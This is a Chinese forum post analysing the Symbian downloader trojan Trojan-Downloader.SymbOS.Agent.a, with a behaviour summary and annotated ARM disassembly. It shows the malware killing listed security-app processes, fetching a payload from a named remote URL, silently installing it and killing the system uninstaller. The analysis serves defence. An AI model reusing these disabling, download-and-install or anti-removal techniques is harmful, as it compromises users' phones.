-
-
[分享]病毒分析:Trojan-Downloader.SymbOS.Agent.a
-
发表于: 2012-7-3 15:58 9893
-
病毒名称:Trojan-Downloader.SymbOS.Agent.a
SHA1:e155055244e734142c2abe7f45f17eb2f6c63889
平台:symbian (S60 3th and 5th)
分析人员:Coderui
分析日期:2011-8-28
病毒行为概要:
安装包的功能:病毒安装包在安装时,显示的软件名称为“Service DS Group”,会在101f875a中创建开机自启动项“[200419A4].rsc”,安装包安装完毕后会自动调用运行病毒主程序“Loader_0x200419A4.exe”,卸载时自动调用运行防卸载程序“Keep_0x200419A5.exe”。在手机中安装如下文件:“!:\sys\bin\Keep_0x200419A5.exe”、“!:\sys\bin\Loader_0x200419A4.exe”、“c:\private\101f875a\import\[200419A4].rsc”、“c:\data\Myapplicationhelp.xml”、“c:\private\200419A4\Version.txt”。
病毒程序功能:首次运行时,会弹出提示框“诺基亚S60组件安装成功。”,并在2秒后自动关闭,然后继续运行。具有反安全软件的功能,在后台遍历进程,强行关闭如下进程:“Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire”。下载“http://sb.huasky.net/update/load_v1.10.sisx”保存为“c:\Data\Others\DocumentLogs.dat”。将“c:\Data\Others\DocumentLogs.dat”重新命名为“c:\Data\Others\DocumentLogs.sis”。以静默安装的方式,安装“c:\Data\Others\DocumentLogs.sis”(下载回来的恶意软件)到手机中。该病毒具有防卸载功能(卸载时系统会自动调用运行Keep_0x200419A5.exe组件,其会关闭系统卸载程序installserver.exe和SWInstSvrUI.exe两个进程,并弹出提示信息“This is a Nokia S60 update components, please don't deleted!”),无法使用系统自带的卸载功能卸载该病毒。
Loader_0x200419A4.exe程序关键点的反汇编代码(附件:Loader_0x200419A4.idb):
----------------------------------------------------------------------------------------------------------------------
首次运行时,弹提示框[诺基亚S60组件安装成功。],2秒左右自动关闭:
.text:71260E64 0D C0 A0 E1 MOV R12, SP
.text:71260E68 60 D8 2D E9 STMFD SP!, {R5,R6,R11,R12,LR,PC}
.text:71260E6C 04 B0 4C E2 SUB R11, R12, #4
.text:71260E70 01 60 A0 E1 MOV R6, R1
.text:71260E74 1F 08 00 EB BL _ZN14CAknGlobalNote4NewLEv ; CAknGlobalNote::NewL(void)
.text:71260E78 00 50 A0 E1 MOV R5, R0
.text:71260E7C BD 07 00 EB BL _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:71260E80 05 00 A0 E1 MOV R0, R5
.text:71260E84 06 20 A0 E1 MOV R2, R6
.text:71260E88 01 10 A0 E3 MOV R1, #1
.text:71260E8C E5 07 00 EB BL _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16 const&) ; 弹窗
.text:71260E90 60 68 9D E8 LDMFD SP, {R5,R6,R11,SP,LR}
.text:71260E94 5D 07 00 EA B _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)
要关闭的进程名,反安全软件[进程名数据]:
Qh360,2002593,s360,2000EED,Agile,MoAshm,NqAv,NqEng,HighCap,NqHc,NQCom,NQPhone,dgserver,Mobile110,QQPim,pw_main,workFire
循环读[进程名]的配置列表,并遍历进程与其匹配:
.text:71260DB4 0D C0 A0 E1 MOV R12, SP
.text:71260DB8 F0 D8 2D E9 STMFD SP!, {R4-R7,R11,R12,LR,PC}
.text:71260DBC 04 B0 4C E2 SUB R11, R12, #4
.text:71260DC0 89 7F 4B E2 SUB R7, R11, #-var_224
.text:71260DC4 42 5E 4B E2 SUB R5, R11, #-var_420
.text:71260DC8 01 1C A0 E3 MOV R1, #0x100
.text:71260DCC 00 60 A0 E1 MOV R6, R0
.text:71260DD0 0C 50 45 E2 SUB R5, R5, #0xC
.text:71260DD4 07 00 A0 E1 MOV R0, R7
.text:71260DD8 00 40 A0 E3 MOV R4, #0
.text:71260DDC 41 DE 4D E2 SUB SP, SP, #0x410
.text:71260DE0 98 07 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71260DE4 01 1C A0 E3 MOV R1, #0x100
.text:71260DE8 05 00 A0 E1 MOV R0, R5
.text:71260DEC 95 07 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71260DF0 68 00 9F E5 LDR R0, =dword_7126321C
.text:71260DF4 B7 00 00 EB BL nullsub_15
.text:71260DF8 00 20 A0 E1 MOV R2, R0
.text:71260DFC 02 10 A0 E1 MOV R1, R2
.text:71260E00 07 00 A0 E1 MOV R0, R7
.text:71260E04 E1 07 00 EB BL _ZN6TDes164CopyERK7TDesC16 ; TDes16::Copy(TDesC16 const&)
.text:71260E08 01 00 00 EA B loc_71260E14
.text:71260E0C 27 00 54 E3 CMP R4, #0x27 ; '''
.text:71260E10 10 00 00 CA BGT loc_71260E58
.text:71260E14 04 30 A0 E1 MOV R3, R4
.text:71260E18 07 10 A0 E1 MOV R1, R7
.text:71260E1C 05 20 A0 E1 MOV R2, R5
.text:71260E20 06 00 A0 E1 MOV R0, R6
.text:71260E24 9F FF FF EB BL sub_71260CA8
.text:71260E28 00 00 50 E3 CMP R0, #0
.text:71260E2C 01 40 84 E2 ADD R4, R4, #1
.text:71260E30 05 10 A0 E1 MOV R1, R5
.text:71260E34 06 00 A0 E1 MOV R0, R6
.text:71260E38 06 00 00 0A BEQ loc_71260E58
.text:71260E3C 2C 34 1B E5 LDR R3, [R11,#var_42C]
.text:71260E40 0F 32 C3 E3 BIC R3, R3, #0xF0000000
.text:71260E44 02 00 53 E3 CMP R3, #2
.text:71260E48 EF FF FF DA BLE loc_71260E0C
.text:71260E4C 92 FE FF EB BL sub_7126089C ; 遍历进程函数[匹配到指定进程名就将其关闭]
.text:71260E50 27 00 54 E3 CMP R4, #0x27 ; '''
.text:71260E54 EE FF FF DA BLE loc_71260E14
.text:71260E58 1C D0 4B E2 SUB SP, R11, #0x1C
.text:71260E5C F0 A8 9D E8 LDMFD SP, {R4-R7,R11,SP,PC}
遍历进程函数[匹配到指定进程名就将其关闭]:
.text:7126089C 0D C0 A0 E1 MOV R12, SP
.text:712608A0 F0 D9 2D E9 STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712608A4 04 B0 4C E2 SUB R11, R12, #4
.text:712608A8 8B 6F 4B E2 SUB R6, R11, #-var_22C
.text:712608AC 11 5D 4B E2 SUB R5, R11, #-var_440
.text:712608B0 01 80 A0 E1 MOV R8, R1
.text:712608B4 06 00 A0 E1 MOV R0, R6
.text:712608B8 01 1C A0 E3 MOV R1, #0x100
.text:712608BC 04 50 45 E2 SUB R5, R5, #4
.text:712608C0 11 7D 4B E2 SUB R7, R11, #-var_440
.text:712608C4 04 70 47 E2 SUB R7, R7, #4
.text:712608C8 04 70 47 E2 SUB R7, R7, #4
.text:712608CC 42 DE 4D E2 SUB SP, SP, #0x420
.text:712608D0 0C D0 4D E2 SUB SP, SP, #0xC
.text:712608D4 DB 08 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:712608D8 05 00 A0 E1 MOV R0, R5
.text:712608DC 1B 09 00 EB BL _ZN15TFindHandleBaseC2Ev ; TFindHandleBase::TFindHandleBase(void)
.text:712608E0 06 10 A0 E1 MOV R1, R6
.text:712608E4 05 00 A0 E1 MOV R0, R5
.text:712608E8 E6 08 00 EB BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712608EC 00 40 50 E2 SUBS R4, R0, #0
.text:712608F0 08 10 A0 E1 MOV R1, R8
.text:712608F4 06 00 A0 E1 MOV R0, R6
.text:712608F8 16 00 00 1A BNE loc_71260958
.text:712608FC 51 09 00 EB BL _ZNK7TDesC165FindFERKS_ ; TDesC16::FindF(TDesC16 const&)
.text:71260900 02 31 A0 E3 MOV R3, #0x80000000
.text:71260904 01 00 70 E3 CMN R0, #1
.text:71260908 04 20 A0 E1 MOV R2, R4
.text:7126090C 43 38 A0 E1 MOV R3, R3,ASR#16
.text:71260910 05 10 A0 E1 MOV R1, R5
.text:71260914 07 00 A0 E1 MOV R0, R7
.text:71260918 F0 FF FF 0A BEQ loc_712608E0
.text:7126091C 48 34 0B E5 STR R3, [R11,#var_448]
.text:71260920 44 09 00 EB BL _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase const&,TOwnerType)
.text:71260924 00 10 50 E2 SUBS R1, R0, #0
.text:71260928 07 00 A0 E1 MOV R0, R7
.text:7126092C EB FF FF 1A BNE loc_712608E0
.text:71260930 3E 09 00 EB BL _ZN8RProcess4KillEi ; RProcess::Kill(int)
.text:71260934 07 00 A0 E1 MOV R0, R7
.text:71260938 36 09 00 EB BL _ZN11RHandleBase5CloseEv ; RHandleBase::Close(void)
.text:7126093C 06 10 A0 E1 MOV R1, R6
.text:71260940 05 00 A0 E1 MOV R0, R5
.text:71260944 CF 08 00 EB BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:71260948 00 40 50 E2 SUBS R4, R0, #0
.text:7126094C 08 10 A0 E1 MOV R1, R8
.text:71260950 06 00 A0 E1 MOV R0, R6
.text:71260954 E8 FF FF 0A BEQ loc_712608FC
.text:71260958 20 D0 4B E2 SUB SP, R11, #0x20
.text:7126095C F0 A9 9D E8 LDMFD SP, {R4-R8,R11,SP,PC}
下载文件的函数[下载“http://sb.huasky.net/update/load_v1.10.sisx”保存为“c:\Data\Others\DocumentLogs.dat”]:
.text:71261238 0D C0 A0 E1 MOV R12, SP
.text:7126123C 70 D8 2D E9 STMFD SP!, {R4-R6,R11,R12,LR,PC}
.text:71261240 04 B0 4C E2 SUB R11, R12, #4
.text:71261244 84 12 9F E5 LDR R1, =0x55555556
.text:71261248 00 50 A0 E1 MOV R5, R0
.text:7126124C C5 DF 4D E2 SUB SP, SP, #0x314
.text:71261250 34 C0 90 E5 LDR R12, [R0,#0x34]
.text:71261254 38 30 9C E5 LDR R3, [R12,#0x38]
.text:71261258 91 E3 C2 E0 SMULL LR, R2, R1, R3
.text:7126125C C3 2F 42 E0 SUB R2, R2, R3,ASR#31
.text:71261260 82 20 82 E0 ADD R2, R2, R2,LSL#1
.text:71261264 03 30 62 E0 RSB R3, R2, R3
.text:71261268 01 00 53 E3 CMP R3, #1
.text:7126126C 00 E0 A0 E3 MOV LR, #0
.text:71261270 73 00 00 0A BEQ loc_71261444
.text:71261274 38 10 9C E5 LDR R1, [R12,#0x38]
.text:71261278 50 22 9F E5 LDR R2, =0x55555556
.text:7126127C 92 01 C3 E0 SMULL R0, R3, R2, R1
.text:71261280 C1 3F 43 E0 SUB R3, R3, R1,ASR#31
.text:71261284 83 30 83 E0 ADD R3, R3, R3,LSL#1
.text:71261288 03 00 51 E1 CMP R1, R3
.text:7126128C 01 00 00 1A BNE loc_71261298
.text:71261290 00 00 5E E3 CMP LR, #0
.text:71261294 60 00 00 0A BEQ loc_7126141C
.text:71261298 38 30 9C E5 LDR R3, [R12,#0x38]
.text:7126129C 2C 12 9F E5 LDR R1, =0x55555556
.text:712612A0 91 03 C2 E0 SMULL R0, R2, R1, R3
.text:712612A4 C3 2F 42 E0 SUB R2, R2, R3,ASR#31
.text:712612A8 82 20 82 E0 ADD R2, R2, R2,LSL#1
.text:712612AC 03 30 62 E0 RSB R3, R2, R3
.text:712612B0 02 00 53 E3 CMP R3, #2
.text:712612B4 42 00 00 0A BEQ loc_712613C4
.text:712612B8 08 60 85 E2 ADD R6, R5, #8
.text:712612BC 0E 20 A0 E1 MOV R2, LR
.text:712612C0 01 10 A0 E3 MOV R1, #1
.text:712612C4 06 00 A0 E1 MOV R0, R6
.text:712612C8 A8 06 00 EB BL _ZN16RHttpDownloadMgr15SetIntAttributeEjl ; RHttpDownloadMgr::SetIntAttribute(uint,long)
.text:712612CC 49 4F 4B E2 SUB R4, R11, #-var_124
.text:712612D0 76 06 00 EB BL _ZN4User12LeaveIfErrorEi ; User::LeaveIfError(int)
.text:712612D4 01 1C A0 E3 MOV R1, #0x100
.text:712612D8 04 00 A0 E1 MOV R0, R4
.text:712612DC A1 06 00 EB BL _ZN9TBufBase8C2Ei ; TBufBase8::TBufBase8(int)
.text:712612E0 EC 01 9F E5 LDR R0, =dword_712635B0
.text:712612E4 43 02 00 EB BL nullsub_19
.text:712612E8 00 20 A0 E1 MOV R2, R0
.text:712612EC 02 10 A0 E1 MOV R1, R2
.text:712612F0 04 00 A0 E1 MOV R0, R4
.text:712612F4 E5 06 00 EB BL _ZN5TDes84CopyERK6TDesC8 ; TDes8::Copy(TDesC8 const&)
.text:712612F8 06 00 A0 E1 MOV R0, R6
.text:712612FC 39 06 00 EB BL _ZN16RHttpDownloadMgr9DeleteAllEv ; RHttpDownloadMgr::DeleteAll(void)
.text:71261300 04 20 85 E2 ADD R2, R5, #4
.text:71261304 04 10 A0 E1 MOV R1, R4
.text:71261308 06 00 A0 E1 MOV R0, R6
.text:7126130C E9 06 00 EB BL _ZN16RHttpDownloadMgr15CreateDownloadLERK6TDesC8Ri ; RHttpDownloadMgr::CreateDownloadL(TDesC8 const&,int &)
.text:71261310 00 60 A0 E1 MOV R6, R0
.text:71261314 BC 01 9F E5 LDR R0, =dword_71263540
.text:71261318 33 02 00 EB BL nullsub_16
.text:7126131C CB 4F 4B E2 SUB R4, R11, #-var_32C
.text:71261320 00 10 A0 E1 MOV R1, R0
.text:71261324 34 00 95 E5 LDR R0, [R5,#0x34]
.text:71261328 8C FD FF EB BL sub_71260960
.text:7126132C 01 1C A0 E3 MOV R1, #0x100
.text:71261330 04 00 A0 E1 MOV R0, R4
.text:71261334 43 06 00 EB BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:71261338 9C 01 9F E5 LDR R0, =dword_712634FC
.text:7126133C 2C FF FF EB BL nullsub_11
.text:71261340 00 20 A0 E1 MOV R2, R0
.text:71261344 02 10 A0 E1 MOV R1, R2
.text:71261348 04 00 A0 E1 MOV R0, R4
.text:7126134C 8F 06 00 EB BL _ZN6TDes164CopyERK7TDesC16 ; TDes16::Copy(TDesC16 const&)
.text:71261350 04 20 A0 E1 MOV R2, R4
.text:71261354 CF 10 A0 E3 MOV R1, #0xCF ; '?
.text:71261358 06 00 A0 E1 MOV R0, R6
.text:7126135C 2F 06 00 EB BL _ZN13RHttpDownload18SetStringAttributeEjRK7TDesC16 ; RHttpDownload::SetStringAttribute(uint,TDesC16 const&)
.text:71261360 FA 1F A0 E3 03+MOV R1, 0x3EB
.text:71261368 01 20 A0 E3 MOV R2, #1
.text:7126136C 06 00 A0 E1 MOV R0, R6
.text:71261370 9C 06 00 EB BL _ZN13RHttpDownload15SetIntAttributeEjl ; RHttpDownload::SetIntAttribute(uint,long)
.text:71261374 3F 1E A0 E3 MOV R1, #0x3F0
.text:71261378 01 20 A0 E3 MOV R2, #1
.text:7126137C 06 00 A0 E1 MOV R0, R6
.text:71261380 84 06 00 EB BL _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261384 3F 1E A0 E3 MOV R1, #0x3F0
.text:71261388 06 00 A0 E1 MOV R0, R6
.text:7126138C 01 10 81 E2 ADD R1, R1, #1
.text:71261390 01 20 A0 E3 MOV R2, #1
.text:71261394 7F 06 00 EB BL _ZN13RHttpDownload16SetBoolAttributeEji ; RHttpDownload::SetBoolAttribute(uint,int)
.text:71261398 04 30 95 E5 LDR R3, [R5,#4]
.text:7126139C 00 00 53 E3 CMP R3, #0
.text:712613A0 03 00 00 0A BEQ loc_712613B4
.text:712613A4 06 00 A0 E1 MOV R0, R6
.text:712613A8 14 06 00 EB BL _ZN13RHttpDownload5StartEv ; RHttpDownload::Start(void) ; 开始执行下载
.text:712613AC 18 D0 4B E2 SUB SP, R11, #0x18
.text:712613B0 70 A8 9D E8 LDMFD SP, {R4-R6,R11,SP,PC} ; 返回
文件重新命名[将“c:\Data\Others\DocumentLogs.dat”重新命名为“c:\Data\Others\DocumentLogs.sis”]:
.text:71260A68 5C 08 00 EB BL _ZN9BaflUtils10RenameFileER3RFsRK7TDesC16S4_j ; BaflUtils::RenameFile(RFs &,TDesC16 const&,TDesC16 const&,uint)
静默安装[安装下载回来的文件“c:\Data\Others\DocumentLogs.sis”]:
.text:71261644 BF 05 00 EB BL SWInstCli_4 ; 安装下载回来的文件“c:\Data\Others\DocumentLogs.sis”
条件选择,功能分支(switch):
.text:712604CC 0D C0 A0 E1 MOV R12, SP
.text:712604D0 30 D8 2D E9 STMFD SP!, {R4,R5,R11,R12,LR,PC}
.text:712604D4 04 B0 4C E2 SUB R11, R12, #4
.text:712604D8 00 40 A0 E1 MOV R4, R0
.text:712604DC 1C 30 90 E5 LDR R3, [R0,#0x1C]
.text:712604E0 00 00 53 E3 CMP R3, #0
.text:712604E4 10 00 00 0A BEQ loc_7126052C ; 遍历进程函数[匹配到指定进程名就将其关闭]
.text:712604E8 01 00 53 E3 CMP R3, #1
.text:712604EC 7A 00 00 0A BEQ loc_712606DC
.text:712604F0 02 00 53 E3 CMP R3, #2
.text:712604F4 22 00 00 0A BEQ loc_71260584
.text:712604F8 03 00 53 E3 CMP R3, #3
.text:712604FC 92 00 00 0A BEQ loc_7126074C ; 下载文件
.text:71260500 04 00 53 E3 CMP R3, #4
.text:71260504 59 00 00 0A BEQ loc_71260670
.text:71260508 05 00 53 E3 CMP R3, #5
.text:7126050C 50 00 00 0A BEQ loc_71260654
.text:71260510 06 00 53 E3 CMP R3, #6
.text:71260514 12 00 00 1A BNE loc_71260564
.text:71260518 90 02 9F E5 LDR R0, =dword_71263018
.text:7126051C B6 02 00 EB BL nullsub_13
.text:71260520 08 FF FF EB BL nullsub_2
.text:71260524 BF 09 00 EB BL _ZN16CActiveScheduler4StopEv ; CActiveScheduler::Stop(void)
.text:71260528 0D 00 00 EA B loc_71260564
----------------------------------------------------------------------------------------------------------------------
Keep_0x200419A5.exe程序关键点的反汇编代码(附件:Keep_0x200419A5.idb):
----------------------------------------------------------------------------------------------------------------------
用户代码核心部分:
.text:712F81C0 MOV R12, SP
.text:712F81C4 STMFD SP!, {R11,R12,LR,PC}
.text:712F81C8 LDR R0, =dword_712F9318
.text:712F81CC SUB R11, R12, #4
.text:712F81D0 BL Coderui_sub_1 ; 防卸载:遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe)
.text:712F81D4 LDR R0, =dword_712F92F0
.text:712F81D8 BL nullsub_1
.text:712F81DC BL Coderui_sub_1 ; 防卸载:遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe)
.text:712F81E0 LDR R0, =dword_712F933C
.text:712F81E4 BL nullsub_2
.text:712F81E8 BL Coderui_sub_2 ; 弹出提示信息:This is a Nokia S60 update components, please don't deleted!
.text:712F81EC LDR R0, =dword_712F92C0
.text:712F81F0 BL nullsub_3
.text:712F81F4 LDMFD SP, {R11,SP,LR}
.text:712F81F8 B sub_712F8030
防卸载:遍历关闭指定进程(installserver.exe、SWInstSvrUI.exe):
.text:712F80C8 MOV R12, SP
.text:712F80CC STMFD SP!, {R4-R8,R11,R12,LR,PC}
.text:712F80D0 SUB R11, R12, #4
.text:712F80D4 SUB R6, R11, #-var_22C
.text:712F80D8 SUB R5, R11, #-var_440
.text:712F80DC MOV R1, #0x100
.text:712F80E0 MOV R8, R0
.text:712F80E4 SUB R5, R5, #4
.text:712F80E8 MOV R0, R6
.text:712F80EC SUB R7, R11, #-var_440
.text:712F80F0 SUB R7, R7, #4
.text:712F80F4 SUB R7, R7, #4
.text:712F80F8 SUB SP, SP, #0x420
.text:712F80FC SUB SP, SP, #0xC
.text:712F8100 BL _ZN10TBufBase16C2Ei ; TBufBase16::TBufBase16(int)
.text:712F8104 MOV R0, R5
.text:712F8108 BL _ZN15TFindHandleBaseC2Ev ; TFindHandleBase::TFindHandleBase(void)
.text:712F810C MOV R1, R6
.text:712F8110 MOV R0, R5
.text:712F8114 BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8118 SUBS R4, R0, #0
.text:712F811C MOV R1, R8
.text:712F8120 MOV R0, R6
.text:712F8124 BNE loc_712F8184
.text:712F8128 BL _ZNK7TDesC165FindFERKS_ ; TDesC16::FindF(TDesC16 const&)
.text:712F812C MOV R3, #0x80000000
.text:712F8130 CMN R0, #1
.text:712F8134 MOV R2, R4
.text:712F8138 MOV R3, R3,ASR#16
.text:712F813C MOV R1, R5
.text:712F8140 MOV R0, R7
.text:712F8144 BEQ loc_712F810C
.text:712F8148 STR R3, [R11,#var_448]
.text:712F814C BL _ZN11RHandleBase4OpenERK15TFindHandleBase10TOwnerType ; RHandleBase::Open(TFindHandleBase const&,TOwnerType)
.text:712F8150 SUBS R1, R0, #0
.text:712F8154 MOV R0, R7
.text:712F8158 BNE loc_712F810C
.text:712F815C BL _ZN8RProcess4KillEi ; RProcess::Kill(int)
.text:712F8160 MOV R0, R7
.text:712F8164 BL _ZN11RHandleBase5CloseEv ; RHandleBase::Close(void)
.text:712F8168 MOV R1, R6
.text:712F816C MOV R0, R5
.text:712F8170 BL _ZN12TFindProcess4NextER4TBufILi256EE ; TFindProcess::Next(TBuf<256> &)
.text:712F8174 SUBS R4, R0, #0
.text:712F8178 MOV R1, R8
.text:712F817C MOV R0, R6
.text:712F8180 BEQ loc_712F8128
.text:712F8184 SUB SP, R11, #0x20
.text:712F8188 LDMFD SP, {R4-R8,R11,SP,PC}
弹出提示信息:This is a Nokia S60 update components, please don't deleted!:
.text:712F818C MOV R12, SP
.text:712F8190 STMFD SP!, {R5,R7,R11,R12,LR,PC}
.text:712F8194 SUB R11, R12, #4
.text:712F8198 MOV R7, R0
.text:712F819C BL _ZN14CAknGlobalNote4NewLEv ; CAknGlobalNote::NewL(void)
.text:712F81A0 MOV R5, R0
.text:712F81A4 BL _ZN12CleanupStack5PushLEP5CBase ; CleanupStack::PushL(CBase *)
.text:712F81A8 MOV R0, R5
.text:712F81AC MOV R2, R7
.text:712F81B0 MOV R1, #1
.text:712F81B4 BL _ZN14CAknGlobalNote9ShowNoteLE18TAknGlobalNoteTypeRK7TDesC16 ; CAknGlobalNote::ShowNoteL(TAknGlobalNoteType,TDesC16 const&)
.text:712F81B8 LDMFD SP, {R5,R7,R11,SP,LR}
.text:712F81BC B _ZN12CleanupStack13PopAndDestroyEv ; CleanupStack::PopAndDestroy(void)
----------------------------------------------------------------------------------------------------------------------
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课